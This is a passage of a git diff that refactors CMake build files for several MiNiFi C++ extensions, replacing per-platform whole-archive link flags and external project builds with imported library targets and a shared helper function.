+target_link_libraries(minifi-aws ${LIBMINIFI})
 
+target_link_libraries(minifi-aws AWS::aws-cpp-sdk-core)
+target_link_libraries(minifi-aws AWS::aws-cpp-sdk-s3)
 
-if (APPLE)
-    if(STATIC_BUILD)
-        target_link_libraries(minifi-aws "-framework CoreFoundation")
-    endif()
-endif()
-
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-c-common.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-checksums.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-c-event-stream.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-cpp-sdk-core.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-cpp-sdk-s3.${SUFFIX})
-
-add_dependencies(minifi-aws awssdk-external)
 SET (AWS-EXTENSION minifi-aws PARENT_SCOPE)
-register_extension(minifi-aws)
\ No newline at end of file
+register_extension(minifi-aws)
diff --git a/extensions/bootstrap/CMakeLists.txt b/extensions/bootstrap/CMakeLists.txt
index 40d6b99..c6a7980 100644
--- a/extensions/bootstrap/CMakeLists.txt
+++ b/extensions/bootstrap/CMakeLists.txt
@@ -19,7 +19,7 @@
 
 cmake_minimum_required(VERSION 2.6)
 
-include_directories(../../libminifi/include ../thirdparty/cxxopts/include)
+include_directories(../../libminifi/include)
 
 set(BOOTSTRAP_SOURCES  bootstrap.cpp)
 add_executable(bstrp ${BOOTSTRAP_SOURCES})
diff --git a/extensions/bustache/CMakeLists.txt b/extensions/bustache/CMakeLists.txt
index 2efb586..7cdf351 100644
--- a/extensions/bustache/CMakeLists.txt
+++ b/extensions/bustache/CMakeLists.txt
@@ -21,37 +21,13 @@
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 cmake_minimum_required(VERSION 2.6)
 
-find_package(Boost COMPONENTS system filesystem iostreams REQUIRED)
-include_directories(${Boost_INCLUDE_DIRS})
-
 file(GLOB SOURCES "*.cpp")
 
 add_library(minifi-bustache-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-bustache-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
-if(THREADS_HAVE_PTHREAD_ARG)
-  target_compile_options(PUBLIC minifi-bustache-extensions "-pthread")
-endif()
-if(CMAKE_THREAD_LIBS_INIT)
-  target_link_libraries(minifi-bustache-extensions "${CMAKE_THREAD_LIBS_INIT}")
-endif()
 
-target_link_libraries(minifi-bustache-extensions ${LIBMINIFI} ${Boost_IOSTREAMS_LIBRARY})
-target_link_libraries(minifi-bustache-extensions ${CMAKE_DL_LIBS})
-target_link_libraries(minifi-bustache-extensions bustache)
-
-if (WIN32)
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-bustache-extensions ${LIBMINIFI})
+target_link_libraries(minifi-bustache-extensions BUSTACHE::libbustache)
 
 
 SET (BUSTACHE-EXTENSIONS minifi-bustache-extensions PARENT_SCOPE)
diff --git a/extensions/civetweb/CMakeLists.txt b/extensions/civetweb/CMakeLists.txt
index 52f0f49..72f9de5 100644
--- a/extensions/civetweb/CMakeLists.txt
+++ b/extensions/civetweb/CMakeLists.txt
@@ -21,25 +21,15 @@
 
 include_directories(${CMAKE_SOURCE_DIR}/libminifi/include
                     ${CMAKE_SOURCE_DIR}/libminifi/include/core
-                    ${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include
-                    ${CMAKE_SOURCE_DIR}/thirdparty/concurrentqueue
-                    ${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include
-                    ${CIVET_THIRDPARTY_ROOT}/include
-                    ${CMAKE_SOURCE_DIR}/thirdparty/jsoncpp/include
                     ${CMAKE_SOURCE_DIR}/thirdparty/
                     ./include)
 
-set(BUILD_CIVET_TESTING OFF)
-add_subdirectory(${CIVET_THIRDPARTY_ROOT}
-                 ${CIVET_BINARY_ROOT}
-                 EXCLUDE_FROM_ALL)
-add_dependencies(c-library libressl-portable)
-
 file(GLOB SOURCES  "processors/*.cpp")
 
 add_library(minifi-civet-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-civet-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
-target_link_libraries(minifi-civet-extensions c-library civetweb-cpp)
+target_link_libraries(minifi-civet-extensions ${LIBMINIFI})
+target_link_libraries(minifi-civet-extensions CIVETWEB::c-library CIVETWEB::civetweb-cpp)
 
 if(THREADS_HAVE_PTHREAD_ARG)
   target_compile_options(PUBLIC minifi-civet-extensions "-pthread")
@@ -49,21 +39,6 @@
 endif()
 
 
-if (WIN32)
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
-
 SET (civet-EXTENSIONS minifi-civet-extensions PARENT_SCOPE)
 
 register_extension(minifi-civet-extensions)
diff --git a/extensions/civetweb/tests/CMakeLists.txt b/extensions/civetweb/tests/CMakeLists.txt
index 723c407..f1bdfba 100644
--- a/extensions/civetweb/tests/CMakeLists.txt
+++ b/extensions/civetweb/tests/CMakeLists.txt
@@ -28,29 +28,23 @@
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/http-curl")
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/civetweb-1.10/include")
-        target_include_directories(${testfilename} PRIVATE BEFORE ${CURL_INCLUDE_DIRS})
 
-        if (APPLE)
-            target_link_libraries (${testfilename} -Wl,-all_load ${ZLIB_LIBRARIES} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors)
-        elseif (WIN32)
-            target_link_libraries (${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors)
-            set_target_properties (${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-civet-extensions /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-        else ()
-            target_link_libraries (${testfilename} -Wl,--whole-archive ${ZLIB_LIBRARIES} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors -Wl,--no-whole-archive)
-        endif ()
+        target_wholearchive_library(${testfilename} minifi-civet-extensions)
+        target_wholearchive_library(${testfilename} minifi-http-curl)
+        target_wholearchive_library(${testfilename} minifi-standard-processors)
 
         createTests("${testfilename}")
         target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
         MATH(EXPR CIVETWEB-EXTENSIONS_TEST_COUNT "${CIVETWEB-EXTENSIONS_TEST_COUNT}+1")
         add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
         # Copy test resources
-                add_custom_command(
-                        TARGET "${testfilename}"
-                        POST_BUILD
-                        COMMAND ${CMAKE_COMMAND} -E copy_directory
-                                "${CMAKE_SOURCE_DIR}/extensions/civetweb/tests/resources"
-                                "$<TARGET_FILE_DIR:${testfilename}>/resources"
-                        )
+        add_custom_command(
+            TARGET "${testfilename}"
+            POST_BUILD
+            COMMAND ${CMAKE_COMMAND} -E copy_directory
+                    "${CMAKE_SOURCE_DIR}/extensions/civetweb/tests/resources"
+                    "$<TARGET_FILE_DIR:${testfilename}>/resources"
+            )
     ENDFOREACH()
     message("-- Finished building ${CIVETWEB-EXTENSIONS_TEST_COUNT} civetweb related test file(s)...")
 endif()
diff --git a/extensions/coap/CMakeLists.txt b/extensions/coap/CMakeLists.txt
index 9bfa977..450dbfe 100644
--- a/extensions/coap/CMakeLists.txt
+++ b/extensions/coap/CMakeLists.txt
@@ -33,56 +33,9 @@
   target_link_libraries(minifi-coap "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-  set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/extensions/coap")
-  # determine version of GNUTLSs
-  set(BYPRODUCT "${BASE_DIR}/extensions/coap/thirdparty/libcoap-src/.libs/libcoap-2.a")
-  set(DIR "${BASE_DIR}/extensions/coap/thirdparty/libcoap-src")
-  ExternalProject_Add(
-    coap-external
-    GIT_REPOSITORY "https://github.com/obgm/libcoap.git"
-    GIT_TAG "00486a4f46e0278dd24a8ff3411416ff420cde29" 
-    PREFIX "${BASE_DIR}/extensions/coap/thirdparty/libcoap"
-    BUILD_IN_SOURCE true
-    SOURCE_DIR "${DIR}"
-    BUILD_COMMAND make
-    CMAKE_COMMAND ""
-    UPDATE_COMMAND ""
-    INSTALL_COMMAND ${CMAKE_COMMAND}  -E echo "Skipping install step."
-    CONFIGURE_COMMAND ""
-    PATCH_COMMAND ./autogen.sh && ./configure --disable-examples --disable-dtls --disable-tests --disable-documentation
-    STEP_TARGETS build
-    EXCLUDE_FROM_ALL TRUE
-  )
-  add_definitions("-DWITH_POSIX=1")
-  
-  add_library(coaplib STATIC IMPORTED)
-  set_target_properties(coaplib PROPERTIES IMPORTED_LOCATION "${BYPRODUCT}")
-  add_dependencies(coaplib coap-external)
-  set(COAP_FOUND "YES" CACHE STRING "" FORCE)
-  set(COAP_INCLUDE_DIRS "${DIR}/include" CACHE STRING "" FORCE)
-  set(COAP_LIBRARIES coaplib CACHE STRING "" FORCE)
-  set(COAP_LIBRARY coaplib CACHE STRING "" FORCE)
-  set(COAP_LIBRARY coaplib CACHE STRING "" FORCE)
-target_link_libraries(minifi-coap ${CMAKE_DL_LIBS})
-
-include_directories(${COAP_INCLUDE_DIRS})
-
-target_link_libraries (nanofi-coap-c ${COAP_LIBRARIES})
-target_link_libraries (nanofi-coap-c ${HTTP-CURL})
-target_link_libraries (minifi-coap nanofi-coap-c ${COAP_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(nanofi-coap-c COAP::libcoap)
+target_link_libraries(minifi-coap ${LIBMINIFI})
+target_link_libraries(minifi-coap nanofi-coap-c COAP::libcoap minifi-http-curl)
 
 SET (COAP-EXTENSION minifi-coap PARENT_SCOPE)
 register_extension(minifi-coap)
diff --git a/extensions/coap/server/CoapServer.cpp b/extensions/coap/server/CoapServer.cpp
index d8cbd7a..9f925de 100644
--- a/extensions/coap/server/CoapServer.cpp
+++ b/extensions/coap/server/CoapServer.cpp
@@ -16,7 +16,6 @@
  * limitations under the License.
  */
 #include "CoapServer.h"
-#include <coap2/utlist.h>
 #include <coap2/coap.h>
 
 namespace org {
diff --git a/extensions/coap/tests/CMakeLists.txt b/extensions/coap/tests/CMakeLists.txt
index 130284c..89ba7af 100644
--- a/extensions/coap/tests/CMakeLists.txt
+++ b/extensions/coap/tests/CMakeLists.txt
@@ -26,10 +26,7 @@
 FOREACH(testfile ${CURL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${COAP_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
   	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../server")
@@ -44,12 +41,12 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/civetweb/")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-coap minifi-civet-extensions minifi-standard-processors)
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-coap minifi-civet-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-coap)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${CURL_INT_TEST_COUNT} CoAP integration test file(s)...")
diff --git a/extensions/expression-language/CMakeLists.txt b/extensions/expression-language/CMakeLists.txt
index 1876c7e..f70f779 100644
--- a/extensions/expression-language/CMakeLists.txt
+++ b/extensions/expression-language/CMakeLists.txt
@@ -96,7 +96,7 @@
 
 add_flex_bison_dependency(el-scanner el-parser)
 endif()
-include_directories(./ ../../libminifi/include  ../../libminifi/include/core ../../thirdparty/cron ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../thirdparty/)
+include_directories(./ ../../libminifi/include  ../../libminifi/include/core ../../thirdparty/)
 include_directories(common)
 include_directories(impl)
 include_directories(../../thirdparty/date/include)
@@ -117,27 +117,8 @@
 add_library(minifi-expression-language-extensions STATIC ${SOURCES} ${BISON_el-parser_OUTPUTS} ${FLEX_el-scanner_OUTPUTS})
 set_property(TARGET minifi-expression-language-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
 
-target_link_libraries(minifi-expression-language-extensions minifi tz)
-
-if (NOT DISABLE_CURL)
-	if (NOT CURL_FOUND)
-		find_package(CURL REQUIRED)
-	endif(NOT CURL_FOUND)
-	include_directories(${CURL_INCLUDE_DIRS})
-	target_link_libraries(minifi-expression-language-extensions ${CURL_LIBRARIES})
-endif()
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-expression-language-extensions ${CMAKE_DL_LIBS})
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-expression-language-extensions ${ZLIB_LIBRARIES})
-
-if (WIN32 AND NOT DISABLE_CURL)
-    set_target_properties(minifi-expression-language-extensions PROPERTIES
-        LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARIES}"
-    )
-endif()
+target_link_libraries(minifi-expression-language-extensions ${LIBMINIFI})
+target_link_libraries(minifi-expression-language-extensions tz RapidJSON CURL::libcurl)
 
 SET (EXPRESSION-LANGUAGE-EXTENSIONS minifi-expression-language-extensions PARENT_SCOPE)
 
diff --git a/extensions/expression-language/noop/CMakeLists.txt b/extensions/expression-language/noop/CMakeLists.txt
index 6424235..7ef550e 100644
--- a/extensions/expression-language/noop/CMakeLists.txt
+++ b/extensions/expression-language/noop/CMakeLists.txt
@@ -19,6 +19,6 @@
 
 message(STATUS "Expression language is disabled; using NoOp implementation")
 file(GLOB SOURCES "*.cpp")
-include_directories(../../../libminifi/include  ../../../libminifi/include/core  ../../../thirdparty/spdlog-20170710/include ../../../thirdparty/concurrentqueue ../../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../../thirdparty/)
+include_directories(../../../libminifi/include  ../../../libminifi/include/core ../../../thirdparty/)
 add_library(minifi-expression-language-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-expression-language-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
\ No newline at end of file
diff --git a/extensions/expression-language/tests/CMakeLists.txt b/extensions/expression-language/tests/CMakeLists.txt
index 52f01d0..c3ca54f 100644
--- a/extensions/expression-language/tests/CMakeLists.txt
+++ b/extensions/expression-language/tests/CMakeLists.txt
@@ -21,7 +21,7 @@
 file(GLOB EXPRESSION_LANGUAGE_TESTS  "*.cpp")
 
 SET(EXTENSIONS_TEST_COUNT 0)
-if (NOT WIN32)
+if(NOT WIN32)
 	FOREACH(testfile ${EXPRESSION_LANGUAGE_TESTS})
 		get_filename_component(testfilename "${testfile}" NAME_WE)
 		add_executable(${testfilename} "${testfile}")
@@ -33,25 +33,12 @@
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/expression-language")
 		createTests(${testfilename})
 		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
+		if(NOT DISABLE_CURL)
+			target_link_libraries(${testfilename} CURL::libcurl)
+		endif()
+		target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+		target_wholearchive_library(${testfilename} minifi-standard-processors)
 
-	
-		if (NOT DISABLE_CURL)
-				target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif()
-		if (WIN32)
-			foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-				if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( "Including ${OPENSSL_LIB}")
-				target_link_libraries (${testfilename} ${OPENSSL_LIB})	
-				set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-				endif()
-			endforeach()
-			target_link_libraries (${testfilename} minifi-expression-language-extensions minifi-standard-processors)
-		elseif (APPLE)
-			target_link_libraries (${testfilename} -Wl,-all_load minifi-expression-language-extensions minifi-standard-processors)
-		else ()
-			target_link_libraries (${testfilename} -Wl,--whole-archive ${OPENSSL_LIBRARIES} minifi-expression-language-extensions minifi-standard-processors -Wl,--no-whole-archive)
-		endif()
 		MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 		add_test(NAME ${testfilename} COMMAND ${testfilename} WORKING_DIRECTORY ${TEST_DIR})
 	ENDFOREACH()
@@ -74,31 +61,12 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/expression-language")
 	createTests(${testfilename})
-	
-	if (WIN32)
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-			if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-			message( "Including ${OPENSSL_LIB}")
-			target_link_libraries (${testfilename} ${OPENSSL_LIB})
-			set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-			endif()
-		endforeach()
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif()
-		target_link_libraries (${testfilename} minifi-expression-language-extensions minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-expression-language-extensions /WHOLEARCHIVE:minifi-standard-processors")
-	elseif (APPLE)
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif(NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-expression-language-extensions minifi-standard-processors)
-	else ()
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif(NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} -Wl,--whole-archive ${OPENSSL_LIBRARIES} minifi-expression-language-extensions minifi-standard-processors -Wl,--no-whole-archive)
+	if(NOT DISABLE_CURL)
+		target_link_libraries(${testfilename} CURL::libcurl)
 	endif()
+	target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${INT_EXTENSIONS_TEST_COUNT}+1")
 ENDFOREACH()
 
diff --git a/extensions/gps/CMakeLists.txt b/extensions/gps/CMakeLists.txt
index 892bff1..25bb816 100644
--- a/extensions/gps/CMakeLists.txt
+++ b/extensions/gps/CMakeLists.txt
@@ -33,21 +33,6 @@
 target_link_libraries(minifi-gps ${LIBMINIFI} )
 target_link_libraries(minifi-gps ${LIBGPS_LIBRARIES})
 
-target_link_libraries(minifi-gps ${CMAKE_DL_LIBS} )
-if (WIN32)
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
 
 SET (GPS-EXTENSION minifi-gps PARENT_SCOPE)
 
diff --git a/extensions/http-curl/CMakeLists.txt b/extensions/http-curl/CMakeLists.txt
index 178ce7f..956fc47 100644
--- a/extensions/http-curl/CMakeLists.txt
+++ b/extensions/http-curl/CMakeLists.txt
@@ -17,8 +17,6 @@
 # under the License.
 #
 
-find_package(CURL REQUIRED)
-
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 include_directories(protocols client processors sitetosite)
 
@@ -33,53 +31,9 @@
   target_link_libraries(minifi-http-curl "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-if (CURL_FOUND)
-  include_directories(${CURL_INCLUDE_DIRS})
-  if (WIN32)
-	message("Including ${CURL_LIBRARY} into minifi-http-curl")
-	target_link_libraries (minifi-http-curl ${CURL_LIBRARY})	
-	set_target_properties(minifi-http-curl PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARY}")
-
-	else()
-			target_link_libraries(minifi-http-curl ${CURL_LIBRARIES})
-	endif()
-endif ()
-
-# Include OpenSSL
-set(OPENSSL_USE_STATIC_LIBS TRUE)
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-http-curl ${CMAKE_DL_LIBS})
+target_link_libraries(minifi-http-curl ${LIBMINIFI})
+target_link_libraries(minifi-http-curl CURL::libcurl RapidJSON)
 target_link_libraries(minifi-http-curl minifi-civet-extensions)
 
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-http-curl ${ZLIB_LIBRARIES})
-if (WIN32)
-
-
-message("${OPENSSL_LIBRARIES}")
-	set (WIN32_ARCHIVES "")
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		if (WIN32)
-		if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( FATAL "Including ${OPENSSL_LIB}")
-		set_target_properties(minifi-http-curl PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-		endif()
-	endif()
-	endforeach()
-
-elseif (APPLE)
-	target_link_libraries(minifi-http-curl ${OPENSSL_LIBRARIES})
-    set_target_properties(minifi-http-curl PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-	message("${OPENSSL_LIBRARIES}")
-	foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		target_link_libraries (minifi-http-curl ${OPENSSL_LIB})
-	endforeach()
-endif ()
-
 SET (HTTP-CURL minifi-http-curl PARENT_SCOPE)
 register_extension(minifi-http-curl)
diff --git a/extensions/http-curl/client/HTTPClient.cpp b/extensions/http-curl/client/HTTPClient.cpp
index 562376d..354d62a 100644
--- a/extensions/http-curl/client/HTTPClient.cpp
+++ b/extensions/http-curl/client/HTTPClient.cpp
@@ -402,11 +402,13 @@
   }
   curl_easy_setopt(http_session, CURLOPT_CAPATH, nullptr);
 #else
+#ifdef OPENSSL_SUPPORT
   curl_easy_setopt(http_session, CURLOPT_SSL_CTX_FUNCTION, &configure_ssl_context);
   curl_easy_setopt(http_session, CURLOPT_SSL_CTX_DATA, static_cast<void*>(ssl_context_service_.get()));
   curl_easy_setopt(http_session, CURLOPT_CAINFO, 0);
   curl_easy_setopt(http_session, CURLOPT_CAPATH, 0);
 #endif
+#endif
 }
 
 bool HTTPClient::isSecure(const std::string &url) {
diff --git a/extensions/http-curl/tests/CMakeLists.txt b/extensions/http-curl/tests/CMakeLists.txt
index 97b53ed..e12e956 100644
--- a/extensions/http-curl/tests/CMakeLists.txt
+++ b/extensions/http-curl/tests/CMakeLists.txt
@@ -25,8 +25,6 @@
 FOREACH(testfile ${CURL_UNIT_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
@@ -38,14 +36,10 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
     target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions minifi-standard-processors)
-	elseif(WIN32)
-		target_link_libraries ("${testfilename}" ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
   	MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 #	 add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
@@ -53,8 +47,6 @@
 FOREACH(testfile ${CURL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
@@ -65,15 +57,11 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/civetweb/")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
 	createTests("${testfilename}")
-        if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-	elseif(WIN32)
-		target_link_libraries ("${testfilename}" ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${CURL_INT_TEST_COUNT} libcURL integration test file(s)...")
